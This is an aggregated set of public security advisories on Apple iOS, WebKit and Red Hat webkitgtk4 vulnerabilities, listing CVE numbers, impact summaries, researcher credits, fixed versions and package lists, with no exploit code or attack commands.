CVE-2019-6208: Jann Horn of Google Project Zero
Keyboard
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Password autofill may fill in passwords after they were
manually cleared
Description: An issue existed with autofill resuming after it was
canceled.
CVE-2019-6206: Sergey Pershenkov
libxpc
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-6218: Ian Beer of Google Project Zero
Natural Language Processing
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted message may lead to a denial
of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2019-6219: Authier Thomas
Safari Reader
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: A cross-site scripting issue existed in Safari. This
issue was addressed with improved URL validation.
CVE-2019-6228: Ryan Pickren (ryanpickren.com)
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A maliciously crafted SQL query may lead to arbitrary code
execution
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2018-20346: Tencent Blade Team
CVE-2018-20505: Tencent Blade Team
CVE-2018-20506: Tencent Blade Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-6227: Qixun Zhao of Qihoo 360 Vulcan Team
CVE-2019-6233: G. Geshev from MWR Labs working with Trend Micro's
Zero Day Initiative
CVE-2019-6234: G. Geshev from MWR Labs working with Trend Micro's
Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-6229: Ryan Pickren (ryanpickren.com)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-6212: an anonymous researcher, Wen Xu of SSLab at Georgia
Tech
CVE-2019-6216: Fluoroacetate working with Trend Micro's Zero Day
Initiative
CVE-2019-6217: Fluoroacetate working with Trend Micro's Zero Day
Initiative, Proteas, Shrek_wzw, and Zhuo Liang of Qihoo 360 Nirvan
Team
CVE-2019-6226: Apple
WebRTC
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-6211: Georgi Geshev (@munmap), Fabi Beterke (@pwnfl4k3s),
and Rob Miller (@trotmaster99) of MWR Labs (@mwrlabs) working with
Trend Micro's Zero Day Initiative
Additional recognition
mDNSResponder
We would like to acknowledge Fatemah Alharbi of University of
California, Riverside (UCR) and Taibah University (TU), Feng Qian of
University of Minnesota - Twin City, Jie Chang of LinkSure Network,
Nael Abu-Ghazaleh of University of California, Riverside (UCR),
Yuchen Zhou of Northeastern University, and Zhiyun Qian of University
of California, Riverside (UCR) for their assistance.
Safari Reader
We would like to acknowledge Ryan Pickren (ryanpickren.com) for their
assistance.
WebKit
We would like to acknowledge James Lee (@Windowsrcer) of Kryptos
Logic for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12.1.3".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlxHSSwpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3GA0RAA
l3Yft6CRTyGtLyqIanBFP4sMtaxlIP44Y0+gPIf59DhZ7bzuy3s+cjnUJAxrqBC+
NAqrNur5x8OVBIS7T65njvccD7e7uGWBZfeEbMdplT5aK3AvRuW7MyXEo3nZu3dx
gMRsubjQmwOnMB3Taxj0a6y2jvLU9DA7IfVyKb7ReCz3wv5KPb4BxLvbHwaMrbsJ
SBETrGYMn4awTSmUs/IQTDECOzRLyicQnY44afDL/K9n/oB59VQm5ZUPDj9ofeQN
UQsD7XVH19eI99N+uNQ+07GCqQ6++qe+kGVi2RR7HERt3wd4mnV895f6UvhlUjlU
K1tY68ZuDNPZ54GJfniFI0OCYfcd5rYsPTnOt11heFnWfG+nnm2r+3BEh60RW5lW
ONeyQ3ScubgMV2Teo3G0tWf9BGvKAI+qXbFuzkAMAucB+f7Oj06WDGhYPEAQZ8KR
xLSb6nyfihQA6Bz4KbfppKC7I2GuyF6rl5iz+VBPHId7yaF0jxjEiJEF7RbLhbeg
k7x8vJrKLR7hAs4AWCq69ZQ6VvmKLdgSNNCcbJIQNPCYtGabOP7xl4piDw4b46wq
/LR6UNrYdf/U3hljPfKIBn+0e1EITcKHfUu85MyHftanF1JFYNp03eFJT5ouyMRt
LD5C8YOX6VcEwCQqUpKmJD9wWwUehRhEiEffGkR+xSY=Jb8S
-----END PGP SIGNATURE-----
|
|
var-201912-0597
|
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. Apple From iCloud for Windows An update for has been released.The expected impact depends on each vulnerability, but can be affected as follows: * Arbitrary code execution * Privilege escalation * information leak. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within HTMLFormElement objects. The issue results from the lack of proper validation of user-supplied data, which can result in memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. WebKit is prone to a information-disclosure and multiple memory-corruption vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. Apple macOS Mojave is a dedicated operating system developed for Mac computers. An input validation error vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 12.3; macOS Mojave prior to 10.14.5; tvOS prior to 12.3; Windows-based iCloud prior to 10.4, prior to 7.12; Windows-based iTunes prior to 12.9.5; Safari versions earlier than 12.1.1. WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization. This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-6237)
WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-8601)
An out-of-bounds read was addressed with improved input validation. (CVE-2019-8644)
A logic issue existed in the handling of synchronous page loads. (CVE-2019-8689)
A logic issue existed in the handling of document loads. (CVE-2019-8719)
This fixes a remote code execution in webkitgtk4. No further details are available in NIST. This issue is fixed in watchOS 6.1. This issue is fixed in watchOS 6.1. This issue is fixed in watchOS 6.1. (CVE-2019-8766)
"Clear History and Website Data" did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)
An issue existed in the drawing of web page elements. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769)
This issue was addressed with improved iframe sandbox enforcement. (CVE-2019-8846)
WebKitGTK up to and including 2.26.4 and WPE WebKit up to and including 2.26.4 (which are the versions right prior to 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. (CVE-2020-10018)
A use-after-free flaw exists in WebKitGTK. A malicious website may be able to cause a denial of service. A DOM object context may not have had a unique security origin. A file URL may be incorrectly processed. (CVE-2020-3885)
A race condition was addressed with additional validation. An application may be able to read restricted memory. (CVE-2020-3901)
An input validation issue was addressed with improved input validation. (CVE-2020-3902).
Installation note:
Safari 12.1.1 may be obtained from the Mac App Store. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: webkitgtk4 security, bug fix, and enhancement update
Advisory ID: RHSA-2020:4035-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:4035
Issue date: 2020-09-29
CVE Names: CVE-2019-6237 CVE-2019-6251 CVE-2019-8506
CVE-2019-8524 CVE-2019-8535 CVE-2019-8536
CVE-2019-8544 CVE-2019-8551 CVE-2019-8558
CVE-2019-8559 CVE-2019-8563 CVE-2019-8571
CVE-2019-8583 CVE-2019-8584 CVE-2019-8586
CVE-2019-8587 CVE-2019-8594 CVE-2019-8595
CVE-2019-8596 CVE-2019-8597 CVE-2019-8601
CVE-2019-8607 CVE-2019-8608 CVE-2019-8609
CVE-2019-8610 CVE-2019-8611 CVE-2019-8615
CVE-2019-8619 CVE-2019-8622 CVE-2019-8623
CVE-2019-8625 CVE-2019-8644 CVE-2019-8649
CVE-2019-8658 CVE-2019-8666 CVE-2019-8669
CVE-2019-8671 CVE-2019-8672 CVE-2019-8673
CVE-2019-8674 CVE-2019-8676 CVE-2019-8677
CVE-2019-8678 CVE-2019-8679 CVE-2019-8680
CVE-2019-8681 CVE-2019-8683 CVE-2019-8684
CVE-2019-8686 CVE-2019-8687 CVE-2019-8688
CVE-2019-8689 CVE-2019-8690 CVE-2019-8707
CVE-2019-8710 CVE-2019-8719 CVE-2019-8720
CVE-2019-8726 CVE-2019-8733 CVE-2019-8735
CVE-2019-8743 CVE-2019-8763 CVE-2019-8764
CVE-2019-8765 CVE-2019-8766 CVE-2019-8768
CVE-2019-8769 CVE-2019-8771 CVE-2019-8782
CVE-2019-8783 CVE-2019-8808 CVE-2019-8811
CVE-2019-8812 CVE-2019-8813 CVE-2019-8814
CVE-2019-8815 CVE-2019-8816 CVE-2019-8819
CVE-2019-8820 CVE-2019-8821 CVE-2019-8822
CVE-2019-8823 CVE-2019-8835 CVE-2019-8844
CVE-2019-8846 CVE-2019-11070 CVE-2020-3862
CVE-2020-3864 CVE-2020-3865 CVE-2020-3867
CVE-2020-3868 CVE-2020-3885 CVE-2020-3894
CVE-2020-3895 CVE-2020-3897 CVE-2020-3899
CVE-2020-3900 CVE-2020-3901 CVE-2020-3902
CVE-2020-10018 CVE-2020-11793
====================================================================
1. Summary:
An update for webkitgtk4 is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
3. Description:
WebKitGTK+ is port of the WebKit portable web rendering engine to the GTK+
platform. These packages provide WebKitGTK+ for GTK+ 3.
The following packages have been upgraded to a later upstream version:
webkitgtk4 (2.28.2). (BZ#1817144)
Security Fix(es):
* webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251,
CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544,
CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571,
CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594,
CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,
CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,
CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644,
CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671,
CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677,
CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683,
CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689,
CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720,
CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763,
CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769,
CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,
CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816,
CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823,
CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862,
CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885,
CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900,
CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 7.9 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
ppc64:
webkitgtk4-2.28.2-2.el7.ppc.rpm
webkitgtk4-2.28.2-2.el7.ppc64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64.rpm
ppc64le:
webkitgtk4-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64le.rpm
s390x:
webkitgtk4-2.28.2-2.el7.s390.rpm
webkitgtk4-2.28.2-2.el7.s390x.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390x.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
ppc64:
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64.rpm
s390x:
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-devel-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390x.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. References:
https://access.redhat.com/security/cve/CVE-2019-6237
https://access.redhat.com/security/cve/CVE-2019-6251
https://access.redhat.com/security/cve/CVE-2019-8506
https://access.redhat.com/security/cve/CVE-2019-8524
https://access.redhat.com/security/cve/CVE-2019-8535
https://access.redhat.com/security/cve/CVE-2019-8536
https://access.redhat.com/security/cve/CVE-2019-8544
https://access.redhat.com/security/cve/CVE-2019-8551
https://access.redhat.com/security/cve/CVE-2019-8558
https://access.redhat.com/security/cve/CVE-2019-8559
https://access.redhat.com/security/cve/CVE-2019-8563
https://access.redhat.com/security/cve/CVE-2019-8571
https://access.redhat.com/security/cve/CVE-2019-8583
https://access.redhat.com/security/cve/CVE-2019-8584
https://access.redhat.com/security/cve/CVE-2019-8586
https://access.redhat.com/security/cve/CVE-2019-8587
https://access.redhat.com/security/cve/CVE-2019-8594
https://access.redhat.com/security/cve/CVE-2019-8595
https://access.redhat.com/security/cve/CVE-2019-8596
https://access.redhat.com/security/cve/CVE-2019-8597
https://access.redhat.com/security/cve/CVE-2019-8601
https://access.redhat.com/security/cve/CVE-2019-8607
https://access.redhat.com/security/cve/CVE-2019-8608
https://access.redhat.com/security/cve/CVE-2019-8609
https://access.redhat.com/security/cve/CVE-2019-8610
https://access.redhat.com/security/cve/CVE-2019-8611
https://access.redhat.com/security/cve/CVE-2019-8615
https://access.redhat.com/security/cve/CVE-2019-8619
https://access.redhat.com/security/cve/CVE-2019-8622
https://access.redhat.com/security/cve/CVE-2019-8623
https://access.redhat.com/security/cve/CVE-2019-8625
https://access.redhat.com/security/cve/CVE-2019-8644
https://access.redhat.com/security/cve/CVE-2019-8649
https://access.redhat.com/security/cve/CVE-2019-8658
https://access.redhat.com/security/cve/CVE-2019-8666
https://access.redhat.com/security/cve/CVE-2019-8669
https://access.redhat.com/security/cve/CVE-2019-8671
https://access.redhat.com/security/cve/CVE-2019-8672
https://access.redhat.com/security/cve/CVE-2019-8673
https://access.redhat.com/security/cve/CVE-2019-8674
https://access.redhat.com/security/cve/CVE-2019-8676
https://access.redhat.com/security/cve/CVE-2019-8677
https://access.redhat.com/security/cve/CVE-2019-8678
https://access.redhat.com/security/cve/CVE-2019-8679
https://access.redhat.com/security/cve/CVE-2019-8680
https://access.redhat.com/security/cve/CVE-2019-8681
https://access.redhat.com/security/cve/CVE-2019-8683
https://access.redhat.com/security/cve/CVE-2019-8684
https://access.redhat.com/security/cve/CVE-2019-8686
https://access.redhat.com/security/cve/CVE-2019-8687
https://access.redhat.com/security/cve/CVE-2019-8688
https://access.redhat.com/security/cve/CVE-2019-8689
https://access.redhat.com/security/cve/CVE-2019-8690
https://access.redhat.com/security/cve/CVE-2019-8707
https://access.redhat.com/security/cve/CVE-2019-8710
https://access.redhat.com/security/cve/CVE-2019-8719
https://access.redhat.com/security/cve/CVE-2019-8720
https://access.redhat.com/security/cve/CVE-2019-8726
https://access.redhat.com/security/cve/CVE-2019-8733
https://access.redhat.com/security/cve/CVE-2019-8735
https://access.redhat.com/security/cve/CVE-2019-8743
https://access.redhat.com/security/cve/CVE-2019-8763
https://access.redhat.com/security/cve/CVE-2019-8764
https://access.redhat.com/security/cve/CVE-2019-8765
https://access.redhat.com/security/cve/CVE-2019-8766
https://access.redhat.com/security/cve/CVE-2019-8768
https://access.redhat.com/security/cve/CVE-2019-8769
https://access.redhat.com/security/cve/CVE-2019-8771
https://access.redhat.com/security/cve/CVE-2019-8782
https://access.redhat.com/security/cve/CVE-2019-8783
https://access.redhat.com/security/cve/CVE-2019-8808
https://access.redhat.com/security/cve/CVE-2019-8811
https://access.redhat.com/security/cve/CVE-2019-8812
https://access.redhat.com/security/cve/CVE-2019-8813
https://access.redhat.com/security/cve/CVE-2019-8814
https://access.redhat.com/security/cve/CVE-2019-8815
https://access.redhat.com/security/cve/CVE-2019-8816
https://access.redhat.com/security/cve/CVE-2019-8819
https://access.redhat.com/security/cve/CVE-2019-8820
https://access.redhat.com/security/cve/CVE-2019-8821
https://access.redhat.com/security/cve/CVE-2019-8822
https://access.redhat.com/security/cve/CVE-2019-8823
https://access.redhat.com/security/cve/CVE-2019-8835
https://access.redhat.com/security/cve/CVE-2019-8844
https://access.redhat.com/security/cve/CVE-2019-8846
https://access.redhat.com/security/cve/CVE-2019-11070
https://access.redhat.com/security/cve/CVE-2020-3862
https://access.redhat.com/security/cve/CVE-2020-3864
https://access.redhat.com/security/cve/CVE-2020-3865
https://access.redhat.com/security/cve/CVE-2020-3867
https://access.redhat.com/security/cve/CVE-2020-3868
https://access.redhat.com/security/cve/CVE-2020-3885
https://access.redhat.com/security/cve/CVE-2020-3894
https://access.redhat.com/security/cve/CVE-2020-3895
https://access.redhat.com/security/cve/CVE-2020-3897
https://access.redhat.com/security/cve/CVE-2020-3899
https://access.redhat.com/security/cve/CVE-2020-3900
https://access.redhat.com/security/cve/CVE-2020-3901
https://access.redhat.com/security/cve/CVE-2020-3902
https://access.redhat.com/security/cve/CVE-2020-10018
https://access.redhat.com/security/cve/CVE-2020-11793
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. ------------------------------------------------------------------------
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0003
------------------------------------------------------------------------
Date reported : May 20, 2019
Advisory ID : WSA-2019-0003
WebKitGTK Advisory URL :
https://webkitgtk.org/security/WSA-2019-0003.html
WPE WebKit Advisory URL :
https://wpewebkit.org/security/WSA-2019-0003.html
CVE identifiers : CVE-2019-6237, CVE-2019-8571, CVE-2019-8583,
CVE-2019-8584, CVE-2019-8586, CVE-2019-8587,
CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,
CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,
CVE-2019-8608, CVE-2019-8609, CVE-2019-8610,
CVE-2019-8615, CVE-2019-8611, CVE-2019-8619,
CVE-2019-8622, CVE-2019-8623.
CVE-2019-6237
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev working with Trend Micro Zero Day Initiative,
Liu Long of Qihoo 360 Vulcan Team.
CVE-2019-8571
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to 01 working with Trend Micro's Zero Day Initiative.
CVE-2019-8583
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of
Tencent Keen Lab, and dwfault working at ADLab of Venustech.
CVE-2019-8584
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev of MWR Labs working with Trend Micro Zero Day
Initiative.
CVE-2019-8586
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to an anonymous researcher.
CVE-2019-8587
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev working with Trend Micro Zero Day Initiative.
CVE-2019-8594
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Suyoung Lee and Sooel Son of KAIST Web Security & Privacy
Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab.
CVE-2019-8595
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to G. Geshev from MWR Labs working with Trend Micro Zero Day
Initiative.
CVE-2019-8596
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Wen Xu of SSLab at Georgia Tech.
CVE-2019-8597
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to 01 working with Trend Micro Zero Day Initiative.
CVE-2019-8601
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Fluoroacetate working with Trend Micro's Zero Day
Initiative.
CVE-2019-8607
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Junho Jang and Hanul Choi of LINE Security Team.
CVE-2019-8608
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev working with Trend Micro Zero Day Initiative.
CVE-2019-8609
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Wen Xu of SSLab, Georgia Tech.
CVE-2019-8610
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Anonymous working with Trend Micro Zero Day Initiative.
CVE-2019-8615
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to G. Geshev from MWR Labs working with Trend Micro's Zero
Day Initiative.
CVE-2019-8611
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Samuel Gro\xdf of Google Project Zero.
CVE-2019-8619
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of
Chaitin Security Research Lab.
CVE-2019-8622
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Samuel Gro\xdf of Google Project Zero.
CVE-2019-8623
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Samuel Gro\xdf of Google Project Zero.
We recommend updating to the latest stable versions of WebKitGTK and WPE
WebKit. It is the best way to ensure that you are running safe versions
of WebKit. Please check our websites for information about the latest
stable releases.
Further information about WebKitGTK and WPE WebKit security advisories
can be found at: https://webkitgtk.org/security.html or
https://wpewebkit.org/security/.
The WebKitGTK and WPE WebKit team,
May 20, 2019
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
